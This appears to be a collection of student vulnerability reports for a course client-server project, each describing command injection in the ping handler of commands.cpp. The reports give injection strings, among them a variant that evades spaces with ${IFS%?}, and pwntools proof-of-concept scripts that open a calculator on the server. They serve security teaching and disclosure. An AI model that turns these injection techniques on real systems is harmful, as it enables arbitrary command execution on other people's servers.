Vulnerability location : commands.cpp:348

Type of vulnerability : The input to the ping function is not sanitized, thus we can use ; to chain command and execute a calculator.

Exploit : After connecting to the server, the client can simply type :
ping epfl.ch;gnomecalculator

What: command injection
Where: in the do_ping function

You do not sanitize the input of the do_ping function. I was then able to pop a calc

PoC:

#!/usr/bin/env python
from pwn import *
sh = process(['client', '127.0.0.1', '1337'])
sh.sendline("ping stuff;sh${IFS%?}|${IFS%?}gnome-calculator")
sh.interactive()

Ping function is vulnerable. There is no sanitization whatsoever of the arguments in the
ping_cmd ​ function in file commands.cpp thus special characters such as "`&; (...) can be
used directly to inject commands (lines 348-349).

string s = ​ "ping -c 1 "​ + host;
int​ res = ​ exec​ (s.​ c_str​ (), out);

Evidently they just concatenate the ‘host’ to the ping command without sanitizing and call
exec which is essentially a system call that uses popen.
It is possible to do the following exploit and without need of any authentication because ping
does not require so:
"ping `xcalc`" : this will open a calculator
"ping google.ch;xcalc;" : this will open a calculator
"ping &xcalc&" : this will open a calculator
(...)

Where the vulnerability is

In the ping_cmd function, special characters (like ;, & or |) are permitted and not filtered. Moreover, the hostname is directly inserted at the end of the predefined string "ping -c 1 ". This string is then simply executed with the exec function.

Exploitation of the vulnerability

To exploit this vulnerability, it is sufficient to create a parameter of the ping command with no spaces. Since it is possible to use the internal field separator variable in a shell to "emulate" a space, we can construct an exploit just by calling ping on a random host and then use the semicolon and attach another command that execute a remote code (opens a calculator).
After running the server and connecting one client, we can just type on the client the following command and open a calculator like this:

ping google.com;sh${IFS%?}-c${IFS%?}xcalc

which basically corresponds to execute: ping google.com;sh -c xcalc

Where:

They have an "escape" function they use to escape strings that represent a path, but they do not check against any ";" character that one could potentially use to terminate a command and start a new one. Thus, I exploited the ping command by appending another new command (xcalc) that will be executed right after the ping.

Here is a PoC:

#!/usr/bin/env python
from pwn import *

sh = process(['./client', '127.0.0.1', '1337'])

sh.sendline("ping google.ch;xcalc\n")
print sh.interactive()

One can exploit the ping command to open a calculator using the following poc:

from pwn import *
dirname = "."
server_bin = '/bin/server'
client_bin = '/bin/client'
server = process("".join([dirname,server_bin]))
client = process(["".join([dirname,client_bin]), "127.0.0.1", "1337"])
client.sendline("login u1")
client.sendline("pass p1")
client.sendline("ping ;/bin/xcalc;")
#Prevent the process from stopping
pause()

After running make, launch the server with ./bin/server.

Then launch the client with ./bin/client 127.0.0.1 1337 and feed it with

ping stuff;xcalc

which pops a calc on the server side.
Indeed at this line https://github.com/yannvon/grass/blob/master/src/commands.cpp#L348 the user input is not escaped.

Command Injection Vulnerability

In this project
In the ping command of this project, there is a vulnerability, if a ";" is added to the end we can then type anything like in a shell in the target server.

Here you can find an example of such a try (this was done on my machine where xcalc is not a program recognized)

How to trigger the vulnerability

`
login u1
pass p1
ping google.fr;xcalc
PING google.fr (172.217.168.3) 56(84) bytes of data.
64 bytes from zrh11s03-in-f3.1e100.net (172.217.168.3): icmp_seq=1 ttl=55 time=5.48 ms

--- google.fr ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 5.482/5.482/5.482/0.000 ms
sh: xcalc : commande introuvable
`

I am able to open a calculator when executing the ping command.
Here's a PoC:

'''
This script should be put in yannvonn/grass/ directory and run from there.
This script works on freshly restarted Kali Linux 64 bit VM.
Do not forget to make before running script.

Target: https://github.com/yannvon/grass

Exploit: Command Injection - Open calc through ping command
You can also run this by hand by doing:

make
./bin/server
./bin/client 127.0.0.1 1337
login u1
pass p1
ping wowmuchinject.com;xcalc

'''

from pwn import *

server_bin = './bin/server'
client_bin = './bin/client'
IP = "127.0.0.1"
PORT = "1337"
LOGIN = "login u1"
PASS = "pass p1"
CMD = "ping wowmuchinject;xcalc"

server = process(server_bin)
client = process([client_bin, IP,PORT])

client.sendline(LOGIN)
client.sendline(PASS)
client.sendline(CMD)
print("SERVER: {}".format(server.recvall()))